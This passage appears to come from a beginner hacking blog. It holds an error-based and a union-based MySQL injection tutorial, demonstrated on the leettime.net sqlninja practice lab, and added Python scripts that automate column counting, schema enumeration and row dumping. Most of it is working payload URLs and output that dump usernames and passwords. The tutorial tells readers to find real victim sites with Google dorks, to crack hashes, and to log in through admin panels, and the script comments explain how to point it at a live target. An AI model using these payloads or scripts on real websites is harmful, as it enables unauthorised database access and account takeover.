Duplicate entry 'id~1' for key 'group_key'

The first column is id. Again, increase the offset to get the next column:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'username~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'password~1' for key 'group_key'

and again and again...

Part 8 : Dumping data
After getting the database, table and columns, it's time to dump the data!

Our payload to dump the data is +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(_COLUMN_)+AS+CHAR),0x7e))+FROM+_DATABASE_._TABLE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

* NOTE: the value shown in the error message is truncated after 64 characters, so dump one column at a time or a short combination such as CONCAT(username,0x3a,password); anything longer gets cut off. *

So the url will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'admin~1' for key 'group_key'

again, increase the limit by 1.

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'decompiler~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'devilhunte~1' for key 'group_key'

And keep increasing the offset until the page loads normally.
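Every step from Part 5 to Part 8 is the same loop: wrap a one-row subquery in the duplicate-key trick, read the value out of the error message, bump the LIMIT offset, stop when the page loads normally. As an added example (my code, not the author's) here it is in Python, with a constructed stand-in for the vulnerable page so it runs offline; against a real target you would replace fake_target() with a function that fetches the URL and returns the response body. Database and table names are the ones from this post.

```python
import re

# The error we harvest; 0x7e (~) marks the end of the leaked value.
DUP_ENTRY = re.compile(r"Duplicate entry '(.*?)~1' for key 'group_key'")


def hexlit(text):
    """leettime_761wHole -> 0x6c65...; lets names be used without quotes."""
    return "0x" + text.encode("utf-8").hex()


def error_payload(scalar_subquery):
    """Wrap a one-row subquery in the FLOOR(RAND(0)*2) duplicate-key trick.
    The subquery must return one string ending in ~ (the 0x7e marker)."""
    return (
        "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((" + scalar_subquery +
        "),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)-- "
    )


def schema_query(offset):
    return ("SELECT CONCAT(CAST(schema_name AS CHAR),0x7e) "
            "FROM information_schema.schemata LIMIT %d,1" % offset)


def table_query(db, offset):
    return ("SELECT CONCAT(CAST(table_name AS CHAR),0x7e) FROM INFORMATION_SCHEMA.TABLES "
            "WHERE table_schema=%s LIMIT %d,1" % (hexlit(db), offset))


def column_query(db, table, offset):
    return ("SELECT CONCAT(CAST(column_name AS CHAR),0x7e) FROM INFORMATION_SCHEMA.COLUMNS "
            "WHERE table_name=%s AND table_schema=%s LIMIT %d,1"
            % (hexlit(table), hexlit(db), offset))


def row_query(db, table, expr, offset):
    """expr is one column or e.g. CONCAT(username,0x3a,password); keep it
    short, the error message truncates the key after 64 characters."""
    return ("SELECT CONCAT(CAST(CONCAT(%s) AS CHAR),0x7e) FROM %s.%s LIMIT %d,1"
            % (expr, db, table, offset))


def parse_leak(body):
    """The value carried by the duplicate-key error, or None if there was none."""
    m = DUP_ENTRY.search(body)
    return m.group(1) if m else None


def enumerate_values(send, make_query, max_rows=500):
    """Walk LIMIT offsets 0,1,2,... until the page stops erroring."""
    values = []
    for offset in range(max_rows):
        leaked = parse_leak(send(error_payload(make_query(offset))))
        if leaked is None:
            break
        values.append(leaked)
    return values


def fake_target(rows):
    """Constructed stand-in for the vulnerable page: it behaves as if the
    subquery returned rows[offset], so the loop above can run offline."""
    def send(payload):
        offset = int(re.search(r"LIMIT (\d+),1", payload).group(1))
        if offset < len(rows):
            return "Duplicate entry '%s~1' for key 'group_key'" % rows[offset]
        return "<html>page loads normally</html>"
    return send


if __name__ == "__main__":
    db = "leettime_761wHole"
    target = fake_target(["testtable1", "userlogs", "users"])
    print("tables:", enumerate_values(target, lambda o: table_query(db, o)))
    target = fake_target(["admin", "decompiler", "devilhunte"])
    print("usernames:", enumerate_values(target, lambda o: row_query(db, "users", "username", o)))
```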

IV Getting login panel
What's the point of getting login credentials if you don't use them to log in?
Some passwords are stored hashed (MD5, SHA1, etc.). A hash can't be decrypted, but unsalted MD5/SHA1 hashes of common passwords can usually be looked up or cracked at md5online.com or crackstation.net.

There are many tools for finding the login panel, but the common locations are
www.website.com/admin
www.website.com/administrator
www.website.com/admin.php
www.website.com/administrator.php
www.website.com/login.php
www.website.com/cms

V Goodbye
Thank you for reading this tutorial, I hope you learned something! If you have questions or feedback, please don't hesitate to comment!

Thursday, April 14, 2016

Union based SQL Injection 100% noob [BASIC]

!! WARNING FOR EDUCATION PURPOSE ONLY !!

I : Table Of Contents
I : table of contents
II : introduction
Step 1 : Learning basics
Step 2 : Finding target Website
Step 3 : Checking if vulnerable to SQL Injection
Step 4 : Getting vulnerable columns
Step 5 : Getting injectable column
Step 6 : Getting Version
Step 7 : Getting database
Step 8 : Getting tables
Step 9 : Getting columns
Step 10 : Dumping data
Step 11 : Logging in to admin panel or login panel
Tips
Goodbye

II : Introduction

So this is my first tutorial and my second post.
Today I'm going to show you how to attack a website through SQL injection.

Step 1 : Learning basics
1)Google dorks
What are Google dorks? Google dorks are search operators such as "inurl:" and "intext:" that narrow a search to pages of a particular shape.

Why do we need them?
We don't really need them... just kidding, of course we need them to find target websites!

How do we use them?
Go to Google and search: " inurl:news.php?id= "
You'll see results like www.website.com/news.php?id=5

so whats next?

2)SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? Wikipedia, of course.

3)SQL injection
SQL injection is an attack that inserts attacker-controlled text into SQL statements, so the attacker can read, add, update or drop data in the database.

So after those basics, we'll move on to the next basic: basic SQL injection, 100% for the beginner.

Step 2 : Finding target website
google : " inurl:news.php?id= "
You can make your own Google dork if you want; the common dorks are

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

so get some target and lets start.

Step 3 : Checking if vulnerable to SQL Injection
After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

Add a single quote ( ' ) to the end of the number:
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'

If you now see an error message, or the page looks broken, there is a good chance it is vulnerable to SQL injection.
If the page still loads normally it is not a good candidate for this tutorial: it may still be vulnerable (blind injection), but the quick error check won't show it.

What to do if it's not vulnerable?
Find another website, of course.

Step 4 : Getting vulnerable columns
Now that it's vulnerable, count the columns of the query with ORDER BY.
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 1--
Increase the number until you get an error.

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 1-- ("No error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 2-- ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 10--("No error?!")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 100000--("No error?!!")

If that happens, you reach 100000 and still get no error,
it means the id is used inside a quoted string in the query, so your ORDER BY is just part of the string and never reaches the parser.

So how do we fix it?
Close the string with a quote ( ' ) after the number and finish with --+ (the + becomes a space in the URL; MySQL needs a space after -- for it to count as a comment).
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+

Start:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 2--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 4--+ ("Error!!!!")

Error While Selection process : Unknown column '4' in 'order clause'

There we go! ORDER BY 3 works and ORDER BY 4 fails, so the query has 3 columns. Now let's find out which column the page displays!

Question:
What is the " -- "?
-- starts a SQL comment: everything after it, i.e. the remainder of the original query, is ignored.

Step 5 : Getting Injectable column
Now we'll find the injectable column. There are 3 columns, so
put a minus sign ( - ) in front of the id, so the original query matches no row and only our UNION row is displayed, and add union select 1,2,3:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+

And there it is!
Username is : 2

Column 2 is the one the page prints, so that's where we inject our SQL expressions!
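Steps 3 to 5 are the ones worth automating. As an added example, not from the original post, here is a Python version run against a constructed stand-in for basic_ch1.php (an in-memory SQLite table queried with the id pasted into a quoted string, exactly the bug the tutorial relies on): it finds the column count with a binary search over ORDER BY, detects which column the page reflects, and then injects an expression into that column. SQLite has no information_schema, so the demo reads sqlite_master instead; the news table and its row are made up.

```python
import re
import sqlite3


def make_app():
    """Constructed stand-in for basic_ch1.php: three columns selected, with
    the id pasted straight into a quoted string."""
    db = sqlite3.connect(":memory:")
    db.execute("create table news (id integer, title text, username text, body text)")
    db.execute("insert into news values (1, 'Welcome', 'injector', 'first post')")
    db.commit()

    def page(id_param):
        sql = "select title, username, body from news where id='%s'" % id_param
        try:
            row = db.execute(sql).fetchone()
        except sqlite3.OperationalError as e:
            return "Error While Selection process : %s" % e
        return "Username is : %s" % (row[1] if row else "")

    return page


def count_columns(page, base_id, upper=64):
    """Largest n for which ORDER BY n does not error, by binary search
    instead of walking 1,2,3,... by hand."""
    def ok(n):
        return "Error" not in page("%s' order by %d-- " % (base_id, n))

    if ok(upper):
        # ORDER BY 64 'working' means the text never reached the parser
        # (wrong quoting or comment), not a 64-column query.
        raise RuntimeError("ORDER BY is not being interpreted; check quoting")
    if not ok(1):
        raise RuntimeError("even ORDER BY 1 fails; the injection point is broken")
    lo, hi = 1, upper - 1
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if ok(mid):
            lo = mid
        else:
            hi = mid - 1
    return lo


def find_reflected_columns(page, ncols):
    """Which union columns the page prints. Distinct large markers avoid
    matching a stray '2' somewhere else in the HTML."""
    markers = [770000 + i for i in range(1, ncols + 1)]
    body = page("-1' union select %s-- " % ",".join(str(m) for m in markers))
    return [i for i, m in enumerate(markers, start=1) if str(m) in body]


def inject(page, ncols, column, expr):
    """Put any SQL expression into the reflected column and return the page."""
    cols = [expr if i == column else str(i) for i in range(1, ncols + 1)]
    return page("-1' union select %s-- " % ",".join(cols))


def extract(page, ncols, column, expr):
    """Pull just the injected value out of the 'Username is : ...' line."""
    m = re.search(r"Username is : (.*)", inject(page, ncols, column, expr))
    return m.group(1).strip() if m else None


if __name__ == "__main__":
    app = make_app()
    n = count_columns(app, 1)
    col = find_reflected_columns(app, n)[0]
    print("columns:", n, "reflected column:", col)
    # SQLite's sqlite_master plays the role of information_schema.tables here.
    print("tables:", extract(app, n, col, "(select group_concat(name) from sqlite_master)"))
```

The ok(upper) guard is the scripted form of the observation above: if ORDER BY 64 (or 100000) raises no error, you are still inside the string and should fix the quote and comment before trusting any count.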

Step 6 : Checking version
Before extracting anything, let's check the version by replacing the 2 with @@version:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,@@version,3--+

Username is : 5.5.48-cll

If the version is 5 or higher you can proceed: the information_schema database we use in the next steps only exists from MySQL 5.0. On older servers you'd have to guess table and column names, which is blind SQL injection territory and a lot harder, so I recommend changing target.

Step 7 : Getting database
Now that we have the injectable column, let's get the name of the database.
Simply change the 2 to database()
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,database(),3--+

There you go!
Username is : leettime_761wHole

Now we know that the database name is leettime_761wHole.

Save the database name, we'll use it.

Step 8 : Getting tables
After getting the database name, we'll get the tables of that database.
Go to http://shunz19.blogspot.com/2016/04/string-tools.html and hex the database name (as a hex literal it needs no quote characters in the payload, and MySQL compares it as the same string).

Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
then add 0x at the start, so "0x6c65657474696d655f37363177486f6c65"

Simply change the 2 to (select group_concat(table_name) from information_schema.tables where table_schema=0x6c65657474696d655f37363177486f6c65)

So it will be:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x6c65657474696d655f37363177486f6c65),3--+

And there you go!
Username is : testtable1,userlogs,users

We got the tables! Now we have to get the columns.

Step 9 : Getting columns
Just hold on, we're close now. We have to get the columns of a table.
Again you need to hex the table name and add 0x at the start, so
users = " 0x7573657273 "
then simply change the 2 to (select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)
(If another database on the same server also has a users table, add and table_schema=0x6c65657474696d655f37363177486f6c65 to the where clause so you only get this one's columns.)

so the link will be
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+

There we go again!
Username is : id,username,password,user_type,sec_code

Step 10 : Dumping data
This is the easiest step, I think, because it's dump time!
Simply change the 2 to (select group_concat(columns) from database.table)
so (select group_concat(username,password) from leettime_761wHole.users)

So the link will be:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(username,password) from leettime_761wHole.users),3--+

And now :D
Username is : injectorkhan,decompilerhacktract,devilhuntedante,Zensec-idiots,Zenodermussecurity-i,grayhathacker,khanhaxor,adminsadmin

Oh wait, we forgot the separator! Let's add 0x3a.
What is 0x3a?
0x3a is the hex code of " : ". We use it as a separator so we can tell which part is the username and which the password: group_concat(username,0x3a,password)
(group_concat output is capped by group_concat_max_len, 1024 bytes by default, so on a big table you only see the first rows; to page through the rest, read one row at a time with (select concat(username,0x3a,password) from leettime_761wHole.users limit 0,1) and increase the offset.)

so:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(username,0x3a,password) from leettime_761wHole.users),3--+
Username is : injector:khan,decompiler:hacktract,devilhunte:dante,Zen:sec-idiots,Zenodermus:security-i,grayhat:hacker,khan:haxor,admin:sadmin
There you go! Time to find an admin panel to use them on.

Step 11 : Logging in to admin panel or login panel
Some passwords are stored as MD5 hashes; unsalted ones are often crackable with lookup services such as md5online.com, crackstation.net or hash-killer.co.uk.

Now that we have login credentials, we need the login page or admin page to get into the site.
Common locations are:
www.website.com/admin
www.website.com/administrator
www.website.com/login.php
www.website.com/admin.php
www.website.com/administrator.php

Tips
If you want to list all the databases on the server, change the 2 to:
(select group_concat(schema_name) from information_schema.schemata)

Goodbye
I hope you enjoyed the post and learned something! If you have questions or feedback, please feel free to comment!